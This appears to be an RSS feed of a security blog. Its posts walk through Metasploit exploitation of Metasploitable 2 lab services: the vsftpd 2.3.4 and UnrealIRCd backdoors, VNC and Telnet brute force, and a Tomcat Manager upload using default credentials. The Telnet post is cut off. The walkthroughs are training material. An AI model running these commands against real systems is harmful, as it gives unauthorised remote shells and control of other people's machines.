<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet href="/rss.xsl" type="text/xsl"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Janvi</title><description>A coder-ready Astro blog theme with 59 of your favorite color schemes to choose from</description><link>https://multiterm.stelclementine.com</link><item><title>FTP v2.3.4 Backdoor Exploitation</title><link>https://multiterm.stelclementine.com/posts/ftp-exploitation-report</link><guid isPermaLink="true">https://multiterm.stelclementine.com/posts/ftp-exploitation-report</guid><description>VSFTPD v2.3.4 Backdoor Command Execution (CVE-2011-2523) walkthrough.</description><pubDate>Mon, 13 Apr 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;&lt;strong&gt;1. What is FTP?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;FTP (File Transfer Protocol) is a standard network protocol used to transfer files between a client and a server over a TCP/IP network. It typically runs on &lt;strong&gt;port 21&lt;/strong&gt; and allows users to upload, download, and manage files on a remote server.&lt;/p&gt;
&lt;p&gt;FTP supports:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Authentication (username &amp;amp; password)&lt;/li&gt;
&lt;li&gt;Anonymous access (in some cases)&lt;/li&gt;
&lt;li&gt;File operations (upload, download, delete, rename)&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;2. How FTP Works&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;FTP works on a &lt;strong&gt;client-server architecture&lt;/strong&gt; and uses two channels:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Control Channel (Port 21):&lt;/strong&gt;&lt;br /&gt;
Used for sending commands (login, file requests)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Channel (Port 20 or random port):&lt;/strong&gt;&lt;br /&gt;
Used for transferring actual files&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Process:&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Client connects to FTP server&lt;/li&gt;
&lt;li&gt;Server asks for credentials&lt;/li&gt;
&lt;li&gt;Client authenticates (or uses anonymous login)&lt;/li&gt;
&lt;li&gt;Commands are issued (LIST, GET, PUT)&lt;/li&gt;
&lt;li&gt;Data is transferred over a separate channel&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;3. Vulnerability Exploited&lt;/strong&gt;&lt;/h2&gt;
&lt;h3&gt;&lt;strong&gt;Vulnerability Name:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;VSFTPD v2.3.4 Backdoor Command Execution&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Type:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Backdoor / Remote Command Execution (RCE)&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;CVE:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;CVE-2011-2523&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Description:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The FTP service running on Metasploitable 2 (VSFTPD v2.3.4) contains a malicious backdoor. When a specially crafted username is used (ending with &lt;code&gt;:)&lt;/code&gt;), it triggers a hidden backdoor that opens a shell on port &lt;strong&gt;6200&lt;/strong&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;4. How the Exploit Works (Concept)&lt;/strong&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;The attacker connects to the FTP service.&lt;/li&gt;
&lt;li&gt;Instead of normal credentials, a &lt;strong&gt;malicious username containing &lt;code&gt;:)&lt;/code&gt;&lt;/strong&gt; is entered.&lt;/li&gt;
&lt;li&gt;This triggers the backdoor in the FTP service.&lt;/li&gt;
&lt;li&gt;The backdoor opens a new port (&lt;strong&gt;6200&lt;/strong&gt;) on the target machine.&lt;/li&gt;
&lt;li&gt;The attacker connects to this port.&lt;/li&gt;
&lt;li&gt;A shell is obtained with system-level access.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;5. Exploitation&lt;/strong&gt;&lt;/h2&gt;
&lt;h3&gt;Recon using Nmap&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;nmap -sV 192.168.72.130
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405140326.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Step 1: Start Metasploit&lt;/strong&gt;&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;msfconsole
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405140451.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Step 2: Search for the exploit&lt;/strong&gt;&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;search vsftpd 2.3.4
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405140613.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Step 3: Use the exploit&lt;/strong&gt;&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;use exploit/unix/ftp/vsftpd_234_backdoor
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405140713.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Step 4: Set target IP&lt;/strong&gt;&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;set RHOSTS &amp;lt;target-ip&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405140908.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Step 5: Run the exploit&lt;/strong&gt;&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;run
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405141010.png&quot; alt=&quot;&quot; /&gt;&lt;/h2&gt;
&lt;h2&gt;&lt;strong&gt;6. Result&lt;/strong&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Successful exploitation opens a shell session.&lt;/li&gt;
&lt;li&gt;You get command execution access on the target machine.&lt;/li&gt;
&lt;li&gt;Example:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;help
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405141233.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
</content:encoded><author>Katy Kookaburra</author></item><item><title>UnrealIRCd 3.2.8.1 Backdoor Exploitation</title><link>https://multiterm.stelclementine.com/posts/unrealircd-exploitation-report</link><guid isPermaLink="true">https://multiterm.stelclementine.com/posts/unrealircd-exploitation-report</guid><description>Remote Command Execution (RCE) via malicious backdoor (CVE-2010-2075) walkthrough.</description><pubDate>Mon, 13 Apr 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;&lt;strong&gt;1. What is IRC?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;IRC (Internet Relay Chat) is a communication protocol used for real-time text messaging between users over a network. It is commonly used for group discussions in channels as well as private messaging.&lt;/p&gt;
&lt;p&gt;IRC supports:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Real-time messaging&lt;/li&gt;
&lt;li&gt;Channel-based communication&lt;/li&gt;
&lt;li&gt;Private messaging between users&lt;/li&gt;
&lt;li&gt;File sharing (in some implementations)&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;2. How IRC Works&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;IRC works on a &lt;strong&gt;client-server architecture&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Port 6667:&lt;/strong&gt; Default port used for IRC communication&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Process:&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Client connects to an IRC server&lt;/li&gt;
&lt;li&gt;User sets a nickname and username&lt;/li&gt;
&lt;li&gt;Client joins a channel or communicates directly&lt;/li&gt;
&lt;li&gt;Messages are exchanged between users via the server&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;3. Vulnerability Exploited&lt;/strong&gt;&lt;/h2&gt;
&lt;h3&gt;&lt;strong&gt;Vulnerability Name:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;UnrealIRCd 3.2.8.1 Backdoor Command Execution&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Type:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Backdoor / Remote Command Execution (RCE)&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;CVE:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;CVE-2010-2075&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Description:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The UnrealIRCd 3.2.8.1 server contains a malicious backdoor that was introduced in a compromised version of its source code. This backdoor allows attackers to execute arbitrary commands on the server by sending a specially crafted command.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;4. How the Exploit Works (Concept)&lt;/strong&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;The attacker connects to the IRC service running on port 6667.&lt;/li&gt;
&lt;li&gt;A specially crafted command starting with &lt;code&gt;AB;&lt;/code&gt; is sent to the server.&lt;/li&gt;
&lt;li&gt;The backdoor interprets this input as a system command.&lt;/li&gt;
&lt;li&gt;The command is executed on the target machine.&lt;/li&gt;
&lt;li&gt;The attacker gains remote command execution access.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;5. Exploitation&lt;/strong&gt;&lt;/h2&gt;
&lt;h3&gt;Recon using Nmap&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;nmap -sV 192.168.72.130
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405140326.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 1: Start Metasploit&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;msfconsole
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405140451.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 2: Search for the exploit&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;search unrealircd
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405142329.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 3: Use the exploit&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;use exploit/unix/irc/unreal_ircd_3281_backdoor
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405142809.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 4: Set target IP&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;set RHOSTS &amp;lt;target-ip&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405142723.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 5: Run the exploit&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;run
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405143025.png&quot; alt=&quot;&quot; /&gt;&lt;/h2&gt;
&lt;h2&gt;&lt;strong&gt;6. Result&lt;/strong&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Successful exploitation opens a shell session.&lt;/li&gt;
&lt;li&gt;Remote command execution is achieved on the target machine.
Example:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;ls
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405143143.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
</content:encoded><author>Katy Kookaburra</author></item><item><title>VNC Weak Authentication Exploitation</title><link>https://multiterm.stelclementine.com/posts/vnc-exploitation</link><guid isPermaLink="true">https://multiterm.stelclementine.com/posts/vnc-exploitation</guid><description>Brute-force attack on VNC service with weak authentication walkthrough.</description><pubDate>Mon, 13 Apr 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;&lt;strong&gt;1. What is VNC?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;VNC (Virtual Network Computing) is a graphical desktop-sharing system that allows users to remotely control another computer over a network. It typically runs on &lt;strong&gt;port 5900&lt;/strong&gt; and provides access to the remote system’s GUI.&lt;/p&gt;
&lt;p&gt;VNC supports:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Remote desktop access&lt;/li&gt;
&lt;li&gt;Mouse and keyboard control&lt;/li&gt;
&lt;li&gt;Graphical interface interaction&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;2. How VNC Works&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;VNC works on a &lt;strong&gt;client-server architecture&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Port 5900:&lt;/strong&gt; Default port used for VNC connections&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Process:&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Client connects to the VNC server&lt;/li&gt;
&lt;li&gt;Server requests authentication (password)&lt;/li&gt;
&lt;li&gt;Client provides credentials&lt;/li&gt;
&lt;li&gt;If valid, remote desktop session is established&lt;/li&gt;
&lt;li&gt;User can control the system graphically&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;3. Vulnerability Exploited&lt;/strong&gt;&lt;/h2&gt;
&lt;h3&gt;&lt;strong&gt;Vulnerability Name:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Weak VNC Authentication&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Type:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Authentication Weakness / Brute Force&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;CVE:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;N/A (Configuration-based vulnerability)&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Description:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The service running on port &lt;strong&gt;5900/tcp&lt;/strong&gt; is identified as &lt;strong&gt;VNC (protocol 3.3)&lt;/strong&gt;. This version often uses weak authentication mechanisms and may allow access with weak or no password. Attackers can exploit this by brute forcing or directly connecting if authentication is not properly configured.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;4. How the Exploit Works (Concept)&lt;/strong&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;The attacker scans the target and finds VNC running on port 5900.&lt;/li&gt;
&lt;li&gt;The service is identified as VNC protocol 3.3.&lt;/li&gt;
&lt;li&gt;The attacker uses a Metasploit module to brute force the VNC password.&lt;/li&gt;
&lt;li&gt;Weak or default password is discovered.&lt;/li&gt;
&lt;li&gt;The attacker gains access to the remote desktop.&lt;/li&gt;
&lt;li&gt;Full graphical control of the system is achieved.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;5. Exploitation&lt;/strong&gt;&lt;/h2&gt;
&lt;h3&gt;Recon using Nmap&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;nmap -sV 192.168.72.130
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405140326.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 1: Start Metasploit&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;msfconsole
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405220605.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 2: Search for VNC modules&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;search vnc
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405221033.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 3: Use VNC login module&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;use auxiliary/scanner/vnc/vnc_login
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405221235.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 4: Set target IP&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;set RHOSTS &amp;lt;target-ip&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405221422.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 6: Run the module&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;run
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405221534.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 7: Connect to VNC session&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;vncviewer &amp;lt;target-ip&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405221725.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;6. Result&lt;/strong&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Metasploit successfully identifies the VNC password.&lt;/li&gt;
&lt;li&gt;Remote desktop access is obtained.&lt;/li&gt;
&lt;li&gt;The attacker gains full control over the target system’s graphical interface.&lt;/li&gt;
&lt;/ul&gt;
</content:encoded><author>Katy Kookaburra</author></item><item><title>Apache Tomcat Manager Weak Credentials</title><link>https://multiterm.stelclementine.com/posts/apache-tomcat-exploitation</link><guid isPermaLink="true">https://multiterm.stelclementine.com/posts/apache-tomcat-exploitation</guid><description>Exploiting Tomcat Manager with weak credentials to achieve Remote Code Execution walkthrough.</description><pubDate>Mon, 13 Apr 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;&lt;strong&gt;1. What is Apache Tomcat?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Apache Tomcat is an open-source web server and servlet container used to run Java-based web applications. It typically runs on &lt;strong&gt;port 8180 (or 8080)&lt;/strong&gt; and processes JSP (JavaServer Pages) and Servlets.&lt;/p&gt;
&lt;p&gt;Tomcat supports:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Hosting Java web applications&lt;/li&gt;
&lt;li&gt;JSP and Servlet execution&lt;/li&gt;
&lt;li&gt;Web-based management interface&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;2. How Apache Tomcat Works&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Tomcat works on a &lt;strong&gt;client-server architecture&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Port 8180:&lt;/strong&gt; Used for HTTP communication&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Process:&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Client sends an HTTP request to the server&lt;/li&gt;
&lt;li&gt;Tomcat processes the request&lt;/li&gt;
&lt;li&gt;JSP/Servlet is executed&lt;/li&gt;
&lt;li&gt;Response is returned to the client&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;3. Vulnerability Exploited&lt;/strong&gt;&lt;/h2&gt;
&lt;h3&gt;&lt;strong&gt;Vulnerability Name:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Apache Tomcat Manager Weak Credentials&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Type:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Authentication Weakness / Remote Code Execution&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;CVE:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;N/A (Configuration-based vulnerability)&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Description:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The service running on port &lt;strong&gt;8180/tcp&lt;/strong&gt; is identified as &lt;strong&gt;Apache Tomcat/Coyote JSP engine 1.1&lt;/strong&gt;. The Tomcat Manager interface is often exposed with weak or default credentials. If accessed, it allows attackers to upload malicious WAR files and execute code on the server.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;4. How the Exploit Works (Concept)&lt;/strong&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;The attacker scans the target and finds Tomcat running on port 8180.&lt;/li&gt;
&lt;li&gt;The web interface (e.g., &lt;code&gt;/manager/html&lt;/code&gt;) is accessed.&lt;/li&gt;
&lt;li&gt;The attacker uses default or weak credentials to log in.&lt;/li&gt;
&lt;li&gt;Once authenticated, a malicious WAR file is uploaded.&lt;/li&gt;
&lt;li&gt;The server deploys the WAR file.&lt;/li&gt;
&lt;li&gt;The attacker gains remote command execution.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;5. Exploitation&lt;/strong&gt;&lt;/h2&gt;
&lt;h3&gt;Recon using Nmap&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;nmap -sV 192.168.72.130
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405140326.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 1: Start Metasploit&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;msfconsole
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405222541.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 2: Search for Tomcat modules&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;search tomcat
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405232146.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 3: Use Tomcat manager exploit&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;use exploit/multi/http/tomcat_mgr_upload
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405232302.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 4: Set target IP&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;set RHOSTS &amp;lt;target-ip&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405232343.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 5: Set credentials&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;set USERNAME tomcat
set PASSWORD tomcat
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405232423.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 6: Set port&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;set RPORT
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405232530.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 7: Run the exploit&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;run
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405232717.png&quot; alt=&quot;&quot; /&gt;&lt;/h2&gt;
&lt;h2&gt;&lt;strong&gt;6. Result&lt;/strong&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Successful authentication to Tomcat Manager interface.&lt;/li&gt;
&lt;li&gt;Malicious WAR file is uploaded and executed.&lt;/li&gt;
&lt;li&gt;Remote shell access is obtained on the target machine.&lt;/li&gt;
&lt;/ul&gt;
</content:encoded><author>Katy Kookaburra</author></item><item><title>Telnet Weak Credentials Exploitation</title><link>https://multiterm.stelclementine.com/posts/telnet-exploitation</link><guid isPermaLink="true">https://multiterm.stelclementine.com/posts/telnet-exploitation</guid><description>Brute-force attack on Telnet service with weak credentials walkthrough.</description><pubDate>Mon, 13 Apr 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;&lt;strong&gt;1. What is Telnet?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Telnet is a network protocol used to remotely access and manage systems over a TCP/IP network. It typically runs on &lt;strong&gt;port 23&lt;/strong&gt; and allows users to log into a remote machine and execute commands.&lt;/p&gt;
&lt;p&gt;Telnet supports:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Remote login access&lt;/li&gt;
&lt;li&gt;Command execution on remote systems&lt;/li&gt;
&lt;li&gt;Communication between client and server&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;2. How Telnet Works&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Telnet works on a &lt;strong&gt;client-server architecture&lt;/strong&gt; using a single connection:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Port 23:&lt;/strong&gt; Used for communication between client and server&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Process:&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Client connects to the Telnet server&lt;/li&gt;
&lt;li&gt;Server prompts for username and password&lt;/li&gt;
&lt;li&gt;User enters credentials&lt;/li&gt;
&lt;li&gt;If valid, access to remote shell is granted&lt;/li&gt;
&lt;li&gt;Commands can be executed on the target system&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;3. Vulnerability Exploited&lt;/strong&gt;&lt;/h2&gt;
&lt;h3&gt;&lt;strong&gt;Vulnerability Name:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Weak Credentials in Telnet Service&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Type:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Authentication Weakness / Misconfiguration&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;CVE:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;N/A (Configuration-based vulnerability)&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Description:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The service running on port &lt;strong&gt;23/tcp&lt;/strong&gt; is identified as &lt;strong&gt;Linux telnetd&lt;/strong&gt;. The Telnet service is configured with weak/default credentials, making it vulnerable to brute force or credential-based attacks using automated tools like Metasploit.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;4. How the Exploit Works (Concept)&lt;/strong&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;The attacker scans the target and finds Telnet running on port 23.&lt;/li&gt;
&lt;li&gt;The service is identified as Linux telnetd.&lt;/li&gt;
&lt;li&gt;The attacker uses a brute-force module in Metasploit.&lt;/li&gt;
&lt;li&gt;A list of usernames and passwords is tested automatically.&lt;/li&gt;
&lt;li&gt;Valid credentials are discovered.&lt;/li&gt;
&lt;li&gt;The attacker logs in and gains shell access.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;5. Exploitation&lt;/strong&gt;&lt;/h2&gt;
&lt;h3&gt;Recon using Nmap&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;nmap -sV 192.168.72.130
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405140326.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 1: Start Metasploit&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;msfconsole
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405140451.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 2: Search for Telnet modules&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;search telnet
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405152559.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 3: Use Telnet login module&lt;/h3&gt;
